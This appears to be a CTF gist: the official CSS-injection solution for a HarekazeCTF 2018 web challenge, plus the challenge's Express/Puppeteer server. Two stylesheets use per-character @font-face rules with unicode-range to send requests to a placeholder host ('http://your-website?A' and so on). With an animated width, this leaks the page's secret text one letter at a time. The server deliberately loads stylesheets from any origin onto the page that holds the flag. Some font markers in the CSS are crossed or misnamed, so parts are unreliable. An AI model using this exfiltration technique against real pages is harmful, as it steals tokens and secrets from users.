@KageShiron /poc1.css
Last active Feb 11, 2018

HarekazeCTF 2018 Web250-A custom CSS for the flag (Official answer)
/*
 * One @font-face rule per character in A-Z, a-z, "_" and "-". Each rule limits its family to a
 * single code point via unicode-range and gives it a distinct src URL, so a request for that URL
 * indicates the character was rendered with that family (browsers normally fetch a web font only
 * when a glyph inside its unicode-range is needed).
 * `http://your-website` is the author's placeholder for the host that receives the requests.
 * NOTE(review): 'Capital-B' requests "?CB" in this listing; 'under' (U+005F, "_") requests "?-"
 * and 'hyphen' (U+002D, "-") requests "?_", so those two markers are crossed.
 * Defensive note: a page that has to accept third-party styling can close this channel with a
 * Content-Security-Policy that restricts style-src and font-src to trusted origins.
 */
@font-face { font-family: 'Capital-A'; src: url('http://your-website?A'); unicode-range: U+0041; }
@font-face { font-family: 'Capital-B'; src: url('http://your-website?CB'); unicode-range: U+0042; }
@font-face { font-family: 'Capital-C'; src: url('http://your-website?C'); unicode-range: U+0043; }
@font-face { font-family: 'Capital-D'; src: url('http://your-website?D'); unicode-range: U+0044; }
@font-face { font-family: 'Capital-E'; src: url('http://your-website?E'); unicode-range: U+0045; }
@font-face { font-family: 'Capital-F'; src: url('http://your-website?F'); unicode-range: U+0046; }
@font-face { font-family: 'Capital-G'; src: url('http://your-website?G'); unicode-range: U+0047; }
@font-face { font-family: 'Capital-H'; src: url('http://your-website?H'); unicode-range: U+0048; }
@font-face { font-family: 'Capital-I'; src: url('http://your-website?I'); unicode-range: U+0049; }
@font-face { font-family: 'Capital-J'; src: url('http://your-website?J'); unicode-range: U+004A; }
@font-face { font-family: 'Capital-K'; src: url('http://your-website?K'); unicode-range: U+004B; }
@font-face { font-family: 'Capital-L'; src: url('http://your-website?L'); unicode-range: U+004C; }
@font-face { font-family: 'Capital-M'; src: url('http://your-website?M'); unicode-range: U+004D; }
@font-face { font-family: 'Capital-N'; src: url('http://your-website?N'); unicode-range: U+004E; }
@font-face { font-family: 'Capital-O'; src: url('http://your-website?O'); unicode-range: U+004F; }
@font-face { font-family: 'Capital-P'; src: url('http://your-website?P'); unicode-range: U+0050; }
@font-face { font-family: 'Capital-Q'; src: url('http://your-website?Q'); unicode-range: U+0051; }
@font-face { font-family: 'Capital-R'; src: url('http://your-website?R'); unicode-range: U+0052; }
@font-face { font-family: 'Capital-S'; src: url('http://your-website?S'); unicode-range: U+0053; }
@font-face { font-family: 'Capital-T'; src: url('http://your-website?T'); unicode-range: U+0054; }
@font-face { font-family: 'Capital-U'; src: url('http://your-website?U'); unicode-range: U+0055; }
@font-face { font-family: 'Capital-V'; src: url('http://your-website?V'); unicode-range: U+0056; }
@font-face { font-family: 'Capital-W'; src: url('http://your-website?W'); unicode-range: U+0057; }
@font-face { font-family: 'Capital-X'; src: url('http://your-website?X'); unicode-range: U+0058; }
@font-face { font-family: 'Capital-Y'; src: url('http://your-website?Y'); unicode-range: U+0059; }
@font-face { font-family: 'Capital-Z'; src: url('http://your-website?Z'); unicode-range: U+005A; }
@font-face { font-family: 'Small-a'; src: url('http://your-website?a'); unicode-range: U+0061; }
@font-face { font-family: 'Small-b'; src: url('http://your-website?b'); unicode-range: U+0062; }
@font-face { font-family: 'Small-c'; src: url('http://your-website?c'); unicode-range: U+0063; }
@font-face { font-family: 'Small-d'; src: url('http://your-website?d'); unicode-range: U+0064; }
@font-face { font-family: 'Small-e'; src: url('http://your-website?e'); unicode-range: U+0065; }
@font-face { font-family: 'Small-f'; src: url('http://your-website?f'); unicode-range: U+0066; }
@font-face { font-family: 'Small-g'; src: url('http://your-website?g'); unicode-range: U+0067; }
@font-face { font-family: 'Small-h'; src: url('http://your-website?h'); unicode-range: U+0068; }
@font-face { font-family: 'Small-i'; src: url('http://your-website?i'); unicode-range: U+0069; }
@font-face { font-family: 'Small-j'; src: url('http://your-website?j'); unicode-range: U+006A; }
@font-face { font-family: 'Small-k'; src: url('http://your-website?k'); unicode-range: U+006B; }
@font-face { font-family: 'Small-l'; src: url('http://your-website?l'); unicode-range: U+006C; }
@font-face { font-family: 'Small-m'; src: url('http://your-website?m'); unicode-range: U+006D; }
@font-face { font-family: 'Small-n'; src: url('http://your-website?n'); unicode-range: U+006E; }
@font-face { font-family: 'Small-o'; src: url('http://your-website?o'); unicode-range: U+006F; }
@font-face { font-family: 'Small-p'; src: url('http://your-website?p'); unicode-range: U+0070; }
@font-face { font-family: 'Small-q'; src: url('http://your-website?q'); unicode-range: U+0071; }
@font-face { font-family: 'Small-r'; src: url('http://your-website?r'); unicode-range: U+0072; }
@font-face { font-family: 'Small-s'; src: url('http://your-website?s'); unicode-range: U+0073; }
@font-face { font-family: 'Small-t'; src: url('http://your-website?t'); unicode-range: U+0074; }
@font-face { font-family: 'Small-u'; src: url('http://your-website?u'); unicode-range: U+0075; }
@font-face { font-family: 'Small-v'; src: url('http://your-website?v'); unicode-range: U+0076; }
@font-face { font-family: 'Small-w'; src: url('http://your-website?w'); unicode-range: U+0077; }
@font-face { font-family: 'Small-x'; src: url('http://your-website?x'); unicode-range: U+0078; }
@font-face { font-family: 'Small-y'; src: url('http://your-website?y'); unicode-range: U+0079; }
@font-face { font-family: 'Small-z'; src: url('http://your-website?z'); unicode-range: U+007A; }
@font-face { font-family: 'under'; src: url('http://your-website?-'); unicode-range: U+005F; }
@font-face { font-family: 'hyphen'; src: url('http://your-website?_'); unicode-range: U+002D; }
/*
 * The element holding the flag runs the `fade` width animation over 10 s at a constant rate.
 * word-break: break-all lets the text wrap between any two characters, so the amount of text
 * on the first line follows the box width.
 */
#flag {
  word-break: break-all;
  animation: fade 10s linear;
}
/*
 * Only the first rendered line of #flag uses the per-character families, so only characters
 * that are on that line can cause one of the src URLs to be requested.
 * NOTE(review): 'hypen' matches no @font-face in this listing (the declared name is 'hyphen').
 */
#flag::first-line {
  font-family:
    'under', 'hypen',
    'Capital-A', 'Capital-B', 'Capital-C', 'Capital-D', 'Capital-E', 'Capital-F', 'Capital-G',
    'Capital-H', 'Capital-I', 'Capital-J', 'Capital-K', 'Capital-L', 'Capital-M', 'Capital-N',
    'Capital-O', 'Capital-P', 'Capital-Q', 'Capital-R', 'Capital-S', 'Capital-T', 'Capital-U',
    'Capital-V', 'Capital-W', 'Capital-X', 'Capital-Y', 'Capital-Z',
    'Small-a', 'Small-b', 'Small-c', 'Small-d', 'Small-e', 'Small-f', 'Small-g',
    'Small-h', 'Small-i', 'Small-j', 'Small-k', 'Small-l', 'Small-m', 'Small-n',
    'Small-o', 'Small-p', 'Small-q', 'Small-r', 'Small-s', 'Small-t', 'Small-u',
    'Small-v', 'Small-w', 'Small-x', 'Small-y', 'Small-z';
}
/* Width grows from 10px to 500px, so the first line gradually holds more of the text. */
@keyframes fade {
  from {
    width: 10px;
  }
  to {
    width: 500px;
  }
}
/* Front to back (前から後ろ) */
/*
 * One @font-face rule per character in A-Z, a-z, "_" and "-". Each rule limits its family to a
 * single code point via unicode-range and gives it a distinct src URL, so a request for that URL
 * indicates the character was rendered with that family (browsers normally fetch a web font only
 * when a glyph inside its unicode-range is needed).
 * `http://your-website` is the author's placeholder for the host that receives the requests.
 * NOTE(review): 'under' (U+005F, "_") requests "?-" and 'hyphen' (U+002D, "-") requests "?_",
 * so those two markers are crossed.
 * Defensive note: a page that has to accept third-party styling can close this channel with a
 * Content-Security-Policy that restricts style-src and font-src to trusted origins.
 */
@font-face { font-family: 'Capital-A'; src: url('http://your-website?A'); unicode-range: U+0041; }
@font-face { font-family: 'Capital-B'; src: url('http://your-website?B'); unicode-range: U+0042; }
@font-face { font-family: 'Capital-C'; src: url('http://your-website?C'); unicode-range: U+0043; }
@font-face { font-family: 'Capital-D'; src: url('http://your-website?D'); unicode-range: U+0044; }
@font-face { font-family: 'Capital-E'; src: url('http://your-website?E'); unicode-range: U+0045; }
@font-face { font-family: 'Capital-F'; src: url('http://your-website?F'); unicode-range: U+0046; }
@font-face { font-family: 'Capital-G'; src: url('http://your-website?G'); unicode-range: U+0047; }
@font-face { font-family: 'Capital-H'; src: url('http://your-website?H'); unicode-range: U+0048; }
@font-face { font-family: 'Capital-I'; src: url('http://your-website?I'); unicode-range: U+0049; }
@font-face { font-family: 'Capital-J'; src: url('http://your-website?J'); unicode-range: U+004A; }
@font-face { font-family: 'Capital-K'; src: url('http://your-website?K'); unicode-range: U+004B; }
@font-face { font-family: 'Capital-L'; src: url('http://your-website?L'); unicode-range: U+004C; }
@font-face { font-family: 'Capital-M'; src: url('http://your-website?M'); unicode-range: U+004D; }
@font-face { font-family: 'Capital-N'; src: url('http://your-website?N'); unicode-range: U+004E; }
@font-face { font-family: 'Capital-O'; src: url('http://your-website?O'); unicode-range: U+004F; }
@font-face { font-family: 'Capital-P'; src: url('http://your-website?P'); unicode-range: U+0050; }
@font-face { font-family: 'Capital-Q'; src: url('http://your-website?Q'); unicode-range: U+0051; }
@font-face { font-family: 'Capital-R'; src: url('http://your-website?R'); unicode-range: U+0052; }
@font-face { font-family: 'Capital-S'; src: url('http://your-website?S'); unicode-range: U+0053; }
@font-face { font-family: 'Capital-T'; src: url('http://your-website?T'); unicode-range: U+0054; }
@font-face { font-family: 'Capital-U'; src: url('http://your-website?U'); unicode-range: U+0055; }
@font-face { font-family: 'Capital-V'; src: url('http://your-website?V'); unicode-range: U+0056; }
@font-face { font-family: 'Capital-W'; src: url('http://your-website?W'); unicode-range: U+0057; }
@font-face { font-family: 'Capital-X'; src: url('http://your-website?X'); unicode-range: U+0058; }
@font-face { font-family: 'Capital-Y'; src: url('http://your-website?Y'); unicode-range: U+0059; }
@font-face { font-family: 'Capital-Z'; src: url('http://your-website?Z'); unicode-range: U+005A; }
@font-face { font-family: 'Small-a'; src: url('http://your-website?a'); unicode-range: U+0061; }
@font-face { font-family: 'Small-b'; src: url('http://your-website?b'); unicode-range: U+0062; }
@font-face { font-family: 'Small-c'; src: url('http://your-website?c'); unicode-range: U+0063; }
@font-face { font-family: 'Small-d'; src: url('http://your-website?d'); unicode-range: U+0064; }
@font-face { font-family: 'Small-e'; src: url('http://your-website?e'); unicode-range: U+0065; }
@font-face { font-family: 'Small-f'; src: url('http://your-website?f'); unicode-range: U+0066; }
@font-face { font-family: 'Small-g'; src: url('http://your-website?g'); unicode-range: U+0067; }
@font-face { font-family: 'Small-h'; src: url('http://your-website?h'); unicode-range: U+0068; }
@font-face { font-family: 'Small-i'; src: url('http://your-website?i'); unicode-range: U+0069; }
@font-face { font-family: 'Small-j'; src: url('http://your-website?j'); unicode-range: U+006A; }
@font-face { font-family: 'Small-k'; src: url('http://your-website?k'); unicode-range: U+006B; }
@font-face { font-family: 'Small-l'; src: url('http://your-website?l'); unicode-range: U+006C; }
@font-face { font-family: 'Small-m'; src: url('http://your-website?m'); unicode-range: U+006D; }
@font-face { font-family: 'Small-n'; src: url('http://your-website?n'); unicode-range: U+006E; }
@font-face { font-family: 'Small-o'; src: url('http://your-website?o'); unicode-range: U+006F; }
@font-face { font-family: 'Small-p'; src: url('http://your-website?p'); unicode-range: U+0070; }
@font-face { font-family: 'Small-q'; src: url('http://your-website?q'); unicode-range: U+0071; }
@font-face { font-family: 'Small-r'; src: url('http://your-website?r'); unicode-range: U+0072; }
@font-face { font-family: 'Small-s'; src: url('http://your-website?s'); unicode-range: U+0073; }
@font-face { font-family: 'Small-t'; src: url('http://your-website?t'); unicode-range: U+0074; }
@font-face { font-family: 'Small-u'; src: url('http://your-website?u'); unicode-range: U+0075; }
@font-face { font-family: 'Small-v'; src: url('http://your-website?v'); unicode-range: U+0076; }
@font-face { font-family: 'Small-w'; src: url('http://your-website?w'); unicode-range: U+0077; }
@font-face { font-family: 'Small-x'; src: url('http://your-website?x'); unicode-range: U+0078; }
@font-face { font-family: 'Small-y'; src: url('http://your-website?y'); unicode-range: U+0079; }
@font-face { font-family: 'Small-z'; src: url('http://your-website?z'); unicode-range: U+007A; }
@font-face { font-family: 'under'; src: url('http://your-website?-'); unicode-range: U+005F; }
@font-face { font-family: 'hyphen'; src: url('http://your-website?_'); unicode-range: U+002D; }
/*
 * In this variant the per-character families apply to the whole #flag element, which also runs
 * the `fade` width animation for 10 s at a constant rate and may wrap between any two characters.
 * NOTE(review): 'hypen' matches no @font-face in this listing (the declared name is 'hyphen').
 */
#flag {
  word-break: break-all;
  animation: fade 10s linear;
  font-family:
    'under', 'hypen',
    'Capital-A', 'Capital-B', 'Capital-C', 'Capital-D', 'Capital-E', 'Capital-F', 'Capital-G',
    'Capital-H', 'Capital-I', 'Capital-J', 'Capital-K', 'Capital-L', 'Capital-M', 'Capital-N',
    'Capital-O', 'Capital-P', 'Capital-Q', 'Capital-R', 'Capital-S', 'Capital-T', 'Capital-U',
    'Capital-V', 'Capital-W', 'Capital-X', 'Capital-Y', 'Capital-Z',
    'Small-a', 'Small-b', 'Small-c', 'Small-d', 'Small-e', 'Small-f', 'Small-g',
    'Small-h', 'Small-i', 'Small-j', 'Small-k', 'Small-l', 'Small-m', 'Small-n',
    'Small-o', 'Small-p', 'Small-q', 'Small-r', 'Small-s', 'Small-t', 'Small-u',
    'Small-v', 'Small-w', 'Small-x', 'Small-y', 'Small-z';
}
/*
 * The first rendered line is taken out of the per-character families, so only text on later
 * lines is rendered with them.
 * NOTE(review): `none` is not a font-family keyword; it is read as an unquoted family name,
 * presumably chosen because no such font exists.
 */
#flag::first-line {
  font-family: none;
}
/* Width shrinks from 500px to 10px, so text gradually moves off the first line. */
@keyframes fade {
  from {
    width: 500px;
  }
  to {
    width: 10px;
  }
}
'use strict';
const express = require("express");
const bodyParser = require('body-parser');
const puppeteer = require('puppeteer');
const https = require('https');
const fs = require("fs");
const app = express();
const request = require("request");
// Populate req.body from HTML form posts (urlencoded) and from JSON request bodies.
// NOTE(review): with `extended: true` and with JSON bodies a field can arrive as an array or
// object instead of a string, so handlers should type-check what they read from req.body.
app.use(bodyParser.urlencoded({ extended: true }));
app.use(bodyParser.json());
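/**
 * POST /crawl.html handler: verify the submitted reCAPTCHA token with Google and, when it is
 * accepted, open the internal flag page in headless Chromium with the submitted `css` value.
 *
 * Replies "ReCAPTCHA error." when the token is missing, not a string, rejected, or cannot be
 * verified; replies "Crawling" before the browser is started. Failures during the crawl are
 * logged only, because the response has already been sent by then.
 *
 * @param {object} req - Express request; reads req.body['g-recaptcha-response'] and req.body.css.
 * @param {object} res - Express response.
 * @returns {Promise<void>}
 */
async function crawl(req, res) {
  const token = req.body['g-recaptcha-response'];
  if (typeof token !== 'string' || token === '') {
    res.send("ReCAPTCHA error.");
    return;
  }

  // URLSearchParams percent-encodes every value, so a token containing "&" or "=" cannot add or
  // override parameters (such as `secret`) in the verification request.
  // NOTE(review): siteverify is documented as a POST endpoint; a secret carried in a query
  // string can end up in proxy or access logs. Consider sending these fields as a form body.
  const params = new URLSearchParams({
    secret: String(process.env.RECAPTCHA_SECRET),
    response: token,
    remoteip: String(req.connection.remoteAddress),
  });
  const verificationUrl = `https://www.google.com/recaptcha/api/siteverify?${params}`;

  request(verificationUrl, async function (error, response, body) {
    let recaptcha;
    try {
      if (error) {
        throw error;
      }
      recaptcha = JSON.parse(body);
    } catch (err) {
      // A transport error or a non-JSON body used to surface as an unhandled rejection.
      console.error('reCAPTCHA verification failed:', err);
      res.send("ReCAPTCHA error.");
      return;
    }
    if (!recaptcha || recaptcha.success !== true) {
      res.send("ReCAPTCHA error.");
      return;
    }

    res.send("Crawling");

    // Body parsers can deliver arrays or objects; anything that is not a string is visited as
    // an empty value, which the flag page answers with "Bad URI".
    const css = typeof req.body.css === 'string' ? req.body.css : '';
    let browser;
    try {
      browser = await puppeteer.launch({ executablePath: '/usr/bin/chromium' });
      const page = await browser.newPage();
      // NOTE(review): the value is appended without URL-encoding, so "&" or "#" inside it ends
      // the css parameter early. Encoding it here would also require the flag page to stop
      // re-encoding the decoded value with encodeURI, so the concatenation is left as it was.
      await page.goto("http://127.0.0.1:3002/flag.html?css=" + css, { waitUntil: "load" });
      // Keep the page open for 20 s before the browser is shut down.
      await page.waitFor(20000);
    } catch (err) {
      console.error('Crawl failed:', err);
    } finally {
      // Always shut Chromium down, otherwise every failed crawl leaves a browser process behind.
      if (browser) {
        try {
          await browser.close();
        } catch (err) {
          console.error('Closing the browser failed:', err);
        }
      }
    }
  });
}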
// Public app on port 3001.
// NOTE(review): /server.js returns this program's own source to any client, presumably on
// purpose for the CTF; a production service should not expose its server code this way.
app.get('/server.js', (req, res) => {
  res.sendFile("/app/server.js");
});
app.post('/crawl.html', crawl);
app.use('/', express.static('public'));

const server = app.listen(3001, () => {
  // Log the address the listener actually bound to.
  const { address: host, port } = server.address();
  console.log('CSS-Injection http://%s:%s', host, port);
});
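// Internal app that renders the flag page. It listens on localhost:3002 only, so it is reached
// through the headless browser started by the crawler rather than directly by clients.
const app2 = express();

/**
 * GET /flag.html?css=<url>: render the flag inside <div id="flag"> and link the stylesheet
 * named by `css`. Anything other than a single http:// or https:// string gets "Bad URI".
 *
 * Security notes:
 * - The stylesheet URL is chosen by the requester, so CSS from any origin is applied to the
 *   page that contains the secret; this is the weakness the challenge is built around. A real
 *   application should allowlist stylesheet origins and send a Content-Security-Policy that
 *   restricts style-src and font-src.
 * - encodeURI percent-encodes `"`, `<` and `>`, so the value cannot close the href attribute.
 */
app2.get('/flag.html', function (req, res) {
  console.log(req.connection.remoteAddress);
  // A repeated or bracketed `css` parameter is parsed into an array or object, on which
  // startsWith would throw; treat every non-string value as empty instead.
  const css = typeof req.query.css === 'string' ? req.query.css : "";
  if (css.startsWith("http://") || css.startsWith("https://")) {
    res.send(`<html>
<link rel="stylesheet" href="${encodeURI(css)}" />
<body>
<div id="flag">
HarekazeCTF{${fs.readFileSync("flag.txt")}}
</div>
</body>
</html>`);
  } else {
    res.send("Bad URI");
  }
});

const server2 = app2.listen(3002, "localhost");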